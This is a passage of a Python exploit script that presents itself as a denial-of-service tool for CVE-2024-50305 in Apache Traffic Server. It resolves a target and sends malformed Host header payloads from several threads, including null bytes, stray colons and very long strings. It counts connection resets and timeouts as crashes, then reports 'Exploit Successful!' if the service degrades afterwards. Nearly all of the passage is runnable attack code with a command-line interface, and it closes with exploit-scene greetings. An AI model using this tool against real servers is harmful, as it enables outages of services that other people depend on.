        if not version.startswith('HTTP/'):
            return None, protocol

        # Status codes are exactly three digits; reject signs, padding and
        # over-long numbers that int() alone would accept.
        if len(code) != 3 or not code.isdigit():
            return None, protocol

        return int(code), protocol
class TargetResolver:
    """Turn a hostname or IP literal into a connectable ``(ip, port, family)``.

    Answers are memoised per ``(target, port, prefer_ipv6)`` for the lifetime
    of the instance.
    """

    def __init__(self, prefer_ipv6: bool = False):
        self.prefer_ipv6 = prefer_ipv6
        self._cache = {}

    def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
        """Report whether ``target`` is an IP literal and, if so, its family.

        Returns:
            ``(True, socket.AF_INET)`` or ``(True, socket.AF_INET6)`` for a
            literal, ``(False, None)`` for anything else.
        """
        try:
            version = ipaddress.ip_address(target).version
        except ValueError:
            return False, None
        return True, (socket.AF_INET6 if version == 6 else socket.AF_INET)

    def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
        """Resolve ``target`` to ``(ip, port, socket_family)``.

        IP literals are returned unchanged without a lookup. Hostnames are
        looked up one address family at a time, in the preferred order, and
        the first address of the first family that answers is used.

        Returns:
            The resolved triple, or ``None`` when no family produced a result.
        """
        key = f"{target}:{port}:{self.prefer_ipv6}"
        if key in self._cache:
            return self._cache[key]

        literal, literal_family = self._is_ip_address(target)
        if literal:
            answer = (target, port, literal_family)
            self._cache[key] = answer
            return answer

        v4_then_v6 = [socket.AF_INET, socket.AF_INET6]
        lookup_order = v4_then_v6[::-1] if self.prefer_ipv6 else v4_then_v6

        for family in lookup_order:
            try:
                candidates = socket.getaddrinfo(
                    target,
                    port,
                    family=family,
                    type=socket.SOCK_STREAM,
                    proto=socket.IPPROTO_TCP,
                )
                if not candidates:
                    continue
                sockaddr = candidates[0][4]
                # IPv6 socket addresses carry flowinfo and scope id as well.
                if family == socket.AF_INET6:
                    resolved_ip, resolved_port, _flowinfo, _scopeid = sockaddr
                else:
                    resolved_ip, resolved_port = sockaddr
                answer = (resolved_ip, resolved_port, family)
                self._cache[key] = answer
                label = 'IPv6' if family == socket.AF_INET6 else 'IPv4'
                logger.debug(f"Resolved {target} -> {resolved_ip} ({label})")
                return answer
            except socket.gaierror:
                # No record for this family; try the next one.
                continue
            except Exception as e:
                logger.debug(f"Error resolving {target} using family {family}: {e}")
                continue

        logger.error(f"Failed to resolve {target}")
        return None
class ServiceChecker:
    """Probe an endpoint with a well-formed ``GET /`` and classify the result.

    Args:
        timeout: Per-operation socket timeout in seconds.
        max_header_size: Upper bound on the bytes read while waiting for the
            end of the response header.
    """

    def __init__(self, timeout: float = 5, max_header_size: int = 8192):
        self.timeout = timeout
        self.max_header_size = max_header_size

    @staticmethod
    def _sni_name(hostname: Optional[str]) -> Optional[str]:
        """Return ``hostname`` when it is a DNS name; ``None`` for IP literals or empty input."""
        if not hostname:
            return None
        try:
            ipaddress.ip_address(hostname)
        except ValueError:
            return hostname
        return None

    @staticmethod
    def _host_header(ip: str, family: int, hostname: Optional[str]) -> str:
        """Return the Host header value: the hostname if given, else the IP (IPv6 bracketed)."""
        if hostname:
            return hostname
        if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
            return f"[{ip}]"
        return ip

    @contextmanager
    def _create_socket(self, family: int, use_ssl: bool = False,
                       hostname: Optional[str] = None):
        """Yield an unconnected socket (TLS-wrapped on request), closing it on exit.

        Args:
            family: ``socket.AF_INET`` or ``socket.AF_INET6``.
            use_ssl: Wrap the socket in TLS before it is connected.
            hostname: Name offered via SNI; IP literals are not sent as SNI.
        """
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        try:
            if use_ssl:
                context = ssl.create_default_context()
                # NOTE: certificate and hostname verification are switched
                # off, so the peer is not authenticated. check_hostname has to
                # be cleared first or assigning CERT_NONE raises ValueError.
                context.check_hostname = False
                context.verify_mode = ssl.CERT_NONE
                sock = context.wrap_socket(
                    sock, server_hostname=self._sni_name(hostname))
            yield sock
        finally:
            try:
                sock.close()
            except OSError:
                # Best-effort cleanup; a failed close must not mask the
                # outcome of the probe itself.
                pass

    def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
        """Return ``(has_status_code, status_code)`` for the raw response bytes."""
        status_code, _ = HTTPResponseParser.parse_status_line(data)
        return status_code is not None, status_code

    def _read_header(self, sock) -> bytes:
        """Read until the blank line ending the header, EOF, a timeout, or the size cap."""
        response = b""
        while True:
            try:
                chunk = sock.recv(self.max_header_size)
            except socket.timeout:
                break
            if not chunk:
                break
            response += chunk
            if b'\r\n\r\n' in response or len(response) > self.max_header_size:
                break
        return response

    def check(self, ip: str, port: int, family: int,
              hostname: Optional[str] = None,
              use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
        """Send one ``GET /`` and report how the service answered.

        Args:
            ip: Address to connect to.
            port: TCP port to connect to.
            family: ``socket.AF_INET`` or ``socket.AF_INET6``.
            hostname: Name to use for the Host header and SNI. When omitted,
                the IP is used (bracketed for IPv6).
            use_ssl: Speak TLS instead of plain TCP.

        Returns:
            ``(state, response_time_seconds, status_code)``:
            ``UP`` with the status code when a status line was parsed;
            ``UNKNOWN`` when connected but no status line was parsed, or the
            peer reset the connection;
            ``SLOW`` (with the configured timeout as the time) when
            connecting or sending timed out;
            ``DOWN`` when the connection was refused;
            ``ERROR`` for resolution failures and any other exception.
        """
        start_time = time.monotonic()
        try:
            with self._create_socket(family, use_ssl, hostname or ip) as sock:
                host_header = self._host_header(ip, family, hostname)
                request = (
                    f"GET / HTTP/1.1\r\n"
                    f"Host: {host_header}\r\n"
                    f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
                    f"Accept: text/html,application/xhtml+xml\r\n"
                    f"Accept-Language: en-US,en;q=0.9\r\n"
                    f"Connection: close\r\n"
                    f"\r\n"
                ).encode()

                # IPv6 socket addresses also need flowinfo and scope id.
                if family == socket.AF_INET6:
                    sock.connect((ip, port, 0, 0))
                else:
                    sock.connect((ip, port))
                sock.sendall(request)

                response = self._read_header(sock)
                response_time = time.monotonic() - start_time

                _, status_code = self._is_valid_http_response(response)
                if status_code is not None:
                    return ServiceState.UP, response_time, status_code
                return ServiceState.UNKNOWN, response_time, None
        except socket.timeout:
            return ServiceState.SLOW, self.timeout, None
        except ConnectionRefusedError:
            return ServiceState.DOWN, 0, None
        except ConnectionResetError:
            return ServiceState.UNKNOWN, time.monotonic() - start_time, None
        except socket.gaierror:
            return ServiceState.ERROR, 0, None
        except Exception as e:
            logger.debug(f"Check Error: {e}")
            return ServiceState.ERROR, 0, None
class RequestSender:
    """Sends malicious requests with detailed result analysis"""

    def __init__(self, timeout: float = 5, max_response_size: int = 4096):
        """
        Args:
            timeout: Socket timeout in seconds applied to every socket created.
            max_response_size: Reading stops once more than this many bytes
                have been received.
        """
        self.timeout = timeout
        self.max_response_size = max_response_size

    @contextmanager
    def _create_socket(self, family: int):
        """Creates a TCP socket with the configured timeout and closes it on exit"""
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        try:
            yield sock
        finally:
            try:
                sock.close()
            except OSError:
                # Best-effort cleanup: a failure while closing must not mask
                # the result (or exception) produced inside the with-block.
                pass

    def _evaluate_crash_confidence(self, result: RequestResult,
                                   normal_behavior: Dict) -> CrashConfidence:
        """
        Evaluates crash detection confidence based on several factors

        Args:
            result: The request outcome to classify.
            normal_behavior: Accepted for interface compatibility; not read.

        Returns:
            HIGH for a connection reset, MEDIUM for a timeout with no bytes
            received, LOW for an empty response without an error, else NONE.
        """
        if result.connection_reset:
            return CrashConfidence.HIGH
        if result.timeout_occurred and result.bytes_received == 0:
            return CrashConfidence.MEDIUM
        if result.bytes_received == 0 and not result.error:
            return CrashConfidence.LOW
        return CrashConfidence.NONE

    def send(self, ip: str, port: int, family: int,
             host_payload: str, baseline_time: float = 1.0) -> RequestResult:
        """
        Sends a malicious request with accurate result analysis

        Args:
            ip: Address to connect to.
            port: TCP port to connect to.
            family: Socket address family (``socket.AF_INET6`` selects the
                four-element connect address).
            host_payload: Raw value placed in the Host header.
            baseline_time: Normal service response time (accepted but not
                used by the current analysis).

        Returns:
            A ``RequestResult`` describing what happened. Exceptions are not
            propagated: any unexpected error is stored in ``result.error``.
        """
        result = RequestResult(payload=host_payload, response_time=0.0)
        start_time = time.monotonic()
        try:
            with self._create_socket(family) as sock:
                try:
                    if family == socket.AF_INET6:
                        sock.connect((ip, port, 0, 0))
                    else:
                        sock.connect((ip, port))
                except ConnectionRefusedError:
                    result.error = "connection_refused"
                    result.response_time = time.monotonic() - start_time
                    return result
                try:
                    encoded_host = host_payload.encode('utf-8')
                except UnicodeEncodeError:
                    # Reached only for text UTF-8 cannot encode (for example
                    # lone surrogates); fall back to a lossy ASCII encoding.
                    encoded_host = host_payload.encode('ascii', errors='replace')
                request = (
                    b"GET / HTTP/1.1\r\n"
                    b"Host: " + encoded_host + b"\r\n"
                    b"User-Agent: CVE-2024-50305/1.0\r\n"
                    b"Accept: */*\r\n"
                    b"Connection: close\r\n"
                    b"\r\n"
                )
                try:
                    sock.sendall(request)
                except (ConnectionResetError, BrokenPipeError):
                    # Both mean the peer dropped the connection while the
                    # request was being written; they are handled the same
                    # way (the broken-pipe path previously lacked the return).
                    result.connection_reset = True
                    result.response_time = time.monotonic() - start_time
                    result.crash_confidence = CrashConfidence.HIGH
                    return result
                response = b""
                try:
                    while True:
                        try:
                            chunk = sock.recv(4096)
                        except socket.timeout:
                            result.timeout_occurred = True
                            break
                        if not chunk:
                            break
                        response += chunk
                        if len(response) > self.max_response_size:
                            break
                except ConnectionResetError:
                    result.connection_reset = True
                    result.crash_confidence = CrashConfidence.HIGH
                result.response_time = time.monotonic() - start_time
                result.bytes_received = len(response)
                if response:
                    status_code, _ = HTTPResponseParser.parse_status_line(response)
                    result.status_code = status_code
                    if status_code is not None:
                        result.crash_confidence = CrashConfidence.NONE
                    else:
                        result.crash_confidence = CrashConfidence.LOW
                # Anything still unclassified goes through the heuristic.
                if result.crash_confidence == CrashConfidence.NONE:
                    result.crash_confidence = self._evaluate_crash_confidence(result, {})
        except Exception as e:
            result.error = str(e)
            result.response_time = time.monotonic() - start_time
        return result
class PayloadGenerator:
    """Generates malicious Host values"""

    BASE_PAYLOADS = [
        ":", "::", "[::1]", "", "\0",
        "localhost:8080:extra", "host\x00injection",
    ]
    SPECIAL_CHARS = list(string.punctuation + string.whitespace)

    @classmethod
    def generate(cls, count: int = 30) -> List[str]:
        """Generates a list of payloads

        Args:
            count: Requested number of payloads; clamped to the range 10-100.

        Returns:
            At most ``count`` distinct payloads in a stable order: the
            built-in payloads first, then long repeated-character strings,
            then random punctuation/whitespace strings, and finally a few
            Unicode samples if slots remain.
        """
        count = max(10, min(count, 100))
        # A dict de-duplicates while remembering insertion order, so the
        # final truncation always keeps the earliest-added payloads instead
        # of an arbitrary subset.
        ordered = dict.fromkeys(cls.BASE_PAYLOADS)
        for length in (100, 500, 1000, 2000, 5000):
            for fill_char in "AB":
                if len(ordered) >= count:
                    break
                ordered[fill_char * length] = None
        for _ in range(count - len(ordered)):
            length = random.randint(5, 50)
            ordered[''.join(random.choices(cls.SPECIAL_CHARS, k=length))] = None
        # Only reached when random draws collided and left free slots.
        unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
        for sample in unicode_samples[:max(0, count - len(ordered))]:
            ordered[sample] = None
        return list(ordered)[:count]
class StatisticsCollector:
    """Thread-safe statistics collection with memory control"""

    def __init__(self, max_response_times: int = 1000):
        """
        Args:
            max_response_times: Upper bound on the number of individual
                response times retained in the sample list.
        """
        self.lock = threading.Lock()
        self.stats = Statistics()
        self.max_response_times = max_response_times
        self._response_times_sample = []  # Limited sample for analysis

    def add_result(self, result: RequestResult):
        """Adds a result in a thread-safe manner"""
        with self.lock:
            stats = self.stats
            stats.total_requests += 1
            if result.crash_confidence == CrashConfidence.HIGH:
                stats.crashes_high += 1
            elif result.crash_confidence == CrashConfidence.MEDIUM:
                stats.crashes_medium += 1
            elif result.crash_confidence == CrashConfidence.LOW:
                stats.crashes_low += 1
            # Refused, reset and generic errors are mutually exclusive buckets.
            if result.error == "connection_refused":
                stats.connection_refused += 1
            elif result.connection_reset:
                stats.connection_reset += 1
            elif result.error:
                stats.errors += 1
            if result.timeout_occurred:
                stats.timeouts += 1
            if result.status_code is not None:
                stats.successful += 1
                stats.status_codes[result.status_code] += 1
            if result.response_time > 0:
                stats.response_time_sum += result.response_time
                stats.response_time_count += 1
                stats.response_time_min = min(stats.response_time_min, result.response_time)
                stats.response_time_max = max(stats.response_time_max, result.response_time)
                # Cap the sample so memory use stays bounded.
                if len(self._response_times_sample) < self.max_response_times:
                    self._response_times_sample.append(result.response_time)

    def get_stats(self) -> Statistics:
        """Gets a copy of the statistics"""
        with self.lock:
            stats_copy = Statistics(
                total_requests=self.stats.total_requests,
                crashes_high=self.stats.crashes_high,
                crashes_medium=self.stats.crashes_medium,
                crashes_low=self.stats.crashes_low,
                timeouts=self.stats.timeouts,
                connection_refused=self.stats.connection_refused,
                connection_reset=self.stats.connection_reset,
                successful=self.stats.successful,
                errors=self.stats.errors,
                # Copied so the caller's snapshot is not mutated by later updates.
                status_codes=self.stats.status_codes.copy(),
                response_time_sum=self.stats.response_time_sum,
                response_time_count=self.stats.response_time_count,
                response_time_min=self.stats.response_time_min,
                response_time_max=self.stats.response_time_max
            )
            return stats_copy

    def get_average_response_time(self) -> float:
        """Calculates average response time (0.0 when nothing was recorded)"""
        # Read both counters under the lock so a concurrent add_result()
        # cannot update one of them between the check and the division.
        with self.lock:
            if self.stats.response_time_count > 0:
                return self.stats.response_time_sum / self.stats.response_time_count
            return 0.0
class CVE202450305Exploit:
    """Main exploit class

    Resolves the target, records a baseline health check, sends the generated
    Host payloads through a thread pool and compares the service state
    afterwards with the baseline.
    """

    def __init__(self, target: str, port: int = 80, threads: int = 5,
                 timeout: float = 5, prefer_ipv6: bool = False,
                 use_ssl: bool = False, rate_limit: float = 0.1):
        """
        Args:
            target: Target address (IP or domain).
            port: Target port, 1-65535.
            threads: Worker thread count, 1-100.
            timeout: Timeout in seconds handed to the checker and sender.
            prefer_ipv6: Passed to the target resolver.
            use_ssl: Passed to the service checker.
            rate_limit: Delay in seconds before each request is submitted.

        Raises:
            ValueError: If ``port`` or ``threads`` is out of range.
        """
        if not 1 <= port <= 65535:
            raise ValueError(f"Invalid port number: {port}")
        if threads < 1 or threads > 100:
            raise ValueError("Thread count must be between 1 and 100")
        self.target = target
        self.port = port
        self.threads = threads
        self.timeout = timeout
        self.prefer_ipv6 = prefer_ipv6
        self.use_ssl = use_ssl
        self.rate_limit = rate_limit
        self.resolver = TargetResolver(prefer_ipv6)
        self.checker = ServiceChecker(timeout)
        self.sender = RequestSender(timeout)
        self.stats = StatisticsCollector()
        self.target_ip = None
        self.target_family = None
        self.baseline_state = ServiceState.UNKNOWN
        self.baseline_time = 1.0  # Default value
        self.baseline_status = None
        self.is_ip_target = False

    def initialize(self) -> bool:
        """Initializes exploit and resolves target

        Returns:
            True when the target resolved and the baseline check reported
            UP, SLOW or UNKNOWN; False otherwise.
        """
        logger.info(f"Initializing exploit for target {self.target}:{self.port}")
        resolved = self.resolver.resolve(self.target, self.port)
        if not resolved:
            logger.error("Failed to resolve target")
            return False
        self.target_ip, _, self.target_family = resolved
        # Remember whether the user gave a literal address; only real
        # hostnames are forwarded to the checker as ``hostname``.
        try:
            ipaddress.ip_address(self.target)
            self.is_ip_target = True
        except ValueError:
            self.is_ip_target = False
        logger.info(f"Target resolved: {self.target_ip} "
                    f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
        logger.info("Performing baseline service check...")
        state, resp_time, status = self.checker.check(
            self.target_ip, self.port, self.target_family,
            hostname=self.target if not self.is_ip_target else None,
            use_ssl=self.use_ssl
        )
        self.baseline_state = state
        if resp_time > 0:
            self.baseline_time = resp_time
        self.baseline_status = status
        if state == ServiceState.UP:
            logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
            return True
        elif state == ServiceState.SLOW:
            logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
            return True
        elif state == ServiceState.UNKNOWN:
            logger.warning(" Service status is UNKNOWN")
            return True
        else:
            logger.error(f" Service is NOT running: {state.value}")
            return False

    def _process_payload_chunk(self, payloads: List[str], iteration: int,
                               chunk_idx: int) -> List[RequestResult]:
        """Processes a subset of payloads

        Args:
            payloads: Host values to send in this chunk.
            iteration: Current iteration index (not used by the processing).
            chunk_idx: Current chunk index (not used by the processing).

        Returns:
            The results of the requests that completed without raising.
        """
        results = []
        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            future_to_payload = {}
            for payload in payloads:
                # Throttle submission rather than execution.
                if self.rate_limit > 0:
                    time.sleep(self.rate_limit)
                future = executor.submit(
                    self.sender.send,
                    self.target_ip,
                    self.port,
                    self.target_family,
                    payload,
                    self.baseline_time
                )
                future_to_payload[future] = payload
            for future in as_completed(future_to_payload):
                try:
                    result = future.result(timeout=self.timeout + 2)
                    results.append(result)
                    self.stats.add_result(result)
                    if result.crash_confidence == CrashConfidence.HIGH:
                        logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...")
                    elif result.crash_confidence == CrashConfidence.MEDIUM:
                        logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...")
                    elif result.connection_reset:
                        logger.debug(f" Connection reset: {repr(result.payload)[:50]}...")
                    elif result.timeout_occurred:
                        logger.debug(f" Timeout: {repr(result.payload)[:50]}...")
                except Exception as e:
                    logger.error(f"Error processing result: {e}")
        return results

    def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
        """
        Executes the attack

        Args:
            payload_count: Number of payloads requested from the generator.
            iterations: How many times the full payload list is sent.

        Returns:
            (Exploit_Success, Statistics)
        """
        logger.info("=" * 60)
        logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
        logger.info("=" * 60)
        logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
        logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
        logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
        logger.info(f"Rate limit: {self.rate_limit}s")
        logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
        logger.info("=" * 60)
        payloads = PayloadGenerator.generate(payload_count)
        logger.info(f" Generated {len(payloads)} malicious Host values")
        for iteration in range(iterations):
            logger.info(f"\n Iteration {iteration + 1}/{iterations}")
            # NOTE(review): the original expression was an unterminated
            # ``max(1, len(payloads)``; it is closed as written, which yields
            # a single chunk per iteration. Confirm whether a divisor was
            # intended.
            chunk_size = max(1, len(payloads))
            chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
            for chunk_idx, chunk in enumerate(chunks):
                logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}")
                self._process_payload_chunk(chunk, iteration, chunk_idx)
                stats = self.stats.get_stats()
                logger.info(f" Progress: {stats.total_requests}/{iterations * len(payloads)} "
                            f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
                # Pause between chunks, but not after the last one.
                if chunk_idx < len(chunks) - 1:
                    time.sleep(1)
        final_stats = self.stats.get_stats()
        avg_time = self.stats.get_average_response_time()
        logger.info("\n" + "=" * 60)
        logger.info(" Final Statistics:")
        logger.info(f" Total Requests: {final_stats.total_requests}")
        logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
        logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
        logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
        logger.info(f" Timeouts: {final_stats.timeouts}")
        logger.info(f" Connection resets: {final_stats.connection_reset}")
        logger.info(f" Connection refused: {final_stats.connection_refused}")
        logger.info(f" Successful responses: {final_stats.successful}")
        if final_stats.status_codes:
            logger.info(f" Status Codes: {dict(final_stats.status_codes)}")
        if final_stats.response_time_count > 0:
            logger.info(f" Response Time - Avg: {avg_time:.3f}s")
            logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s")
            logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s")
        logger.info("=" * 60)
        logger.info("\n Verifying exploit success...")
        # Give the service a moment before the follow-up health check.
        time.sleep(3)
        post_state, post_time, post_status = self.checker.check(
            self.target_ip, self.port, self.target_family,
            hostname=self.target if not self.is_ip_target else None,
            use_ssl=self.use_ssl
        )
        success = False
        reasons = []
        if final_stats.crashes_high > 0:
            reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
            success = True
        if final_stats.crashes_medium > 3:
            reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
            success = True
        # A state change only counts if the service was healthy beforehand.
        if self.baseline_state == ServiceState.UP:
            if post_state == ServiceState.DOWN:
                reasons.append("Service stopped after attack")
                success = True
            elif post_state == ServiceState.SLOW and self.baseline_time > 0:
                slowdown_ratio = post_time / self.baseline_time
                if slowdown_ratio > 3:
                    reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
                    success = True
        if success:
            logger.info("Exploit Successful!")
            for reason in reasons:
                logger.info(f" • {reason}")
            return True, final_stats
        # Reasons are only recorded together with success, so there is
        # nothing further to list on this path.
        logger.info(" Exploit Failed")
        logger.info(" No evidence of vulnerability found")
        return False, final_stats
def main():
    """Command-line entry point.

    Parses the arguments, builds the exploit object, runs it and terminates
    the process with exit status 0 (success reported), 1 (no success) or
    2 (initialisation failure, interruption, or any error).
    """
    parser = argparse.ArgumentParser(
        description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    # Registered in table order, which is also the order shown by --help.
    option_table = [
        (("target",), {"help": "Target address (IP or domain)"}),
        (("-p", "--port"), {"type": int, "default": 80,
                            "help": "Target port (1-65535, default: 80)"}),
        (("-t", "--threads"), {"type": int, "default": 5,
                               "help": "Thread count (1-100, default: 5)"}),
        (("--timeout",), {"type": float, "default": 5,
                          "help": "Connection timeout in seconds (default: 5)"}),
        (("--ipv6",), {"action": "store_true", "help": "Prefer IPv6"}),
        (("--ssl",), {"action": "store_true", "help": "Use HTTPS/SSL"}),
        (("--rate-limit",), {"type": float, "default": 0.05,
                             "help": "Delay between requests in seconds (default: 0.05)"}),
        (("-c", "--payloads"), {"type": int, "default": 30,
                                "help": "Number of payloads to test (10-100, default: 30)"}),
        (("-i", "--iterations"), {"type": int, "default": 3,
                                  "help": "Number of iterations (default: 3)"}),
        (("-v", "--verbose"), {"action": "store_true",
                               "help": "Show detailed information"}),
    ]
    for flags, options in option_table:
        parser.add_argument(*flags, **options)
    args = parser.parse_args()

    if args.verbose:
        logger.setLevel(logging.DEBUG)

    try:
        exploit = CVE202450305Exploit(
            target=args.target,
            port=args.port,
            threads=args.threads,
            timeout=args.timeout,
            prefer_ipv6=args.ipv6,
            use_ssl=args.ssl,
            rate_limit=args.rate_limit,
        )
        if not exploit.initialize():
            sys.exit(2)
        succeeded, _stats = exploit.run(
            payload_count=args.payloads,
            iterations=args.iterations,
        )
        exit_status = 0 if succeeded else 1
        sys.exit(exit_status)
    except KeyboardInterrupt:
        logger.info("\nAttack stopped by user")
        sys.exit(2)
    except ValueError as e:
        logger.error(f"Input Error: {e}")
        sys.exit(2)
    except Exception as e:
        logger.error(f"Unexpected Error: {e}")
        if args.verbose:
            # Imported lazily: only needed on this diagnostic path.
            import traceback
            traceback.print_exc()
        sys.exit(2)
# Run the command-line entry point only when this file is executed as a
# script, not when it is imported as a module.
if __name__ == "__main__":
    main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================